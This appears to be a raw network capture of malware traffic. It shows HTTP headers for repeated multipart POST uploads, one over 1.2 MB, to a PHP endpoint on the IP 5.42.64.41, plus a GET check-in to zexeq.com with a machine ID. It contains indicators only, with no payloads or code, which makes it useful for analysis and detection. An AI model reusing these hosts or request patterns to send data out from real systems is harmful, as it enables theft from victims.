HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2160 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA Host: 5.42.64.41 Content-Length: 383 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFC Host: 5.42.64.41 Content-Length: 1234659 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

GET /test2/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:53:21 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 558 Connection: close Content-Type: text/html; charset=UTF-8

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG Host: 5.42.64.41 Content-Length: 776999 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive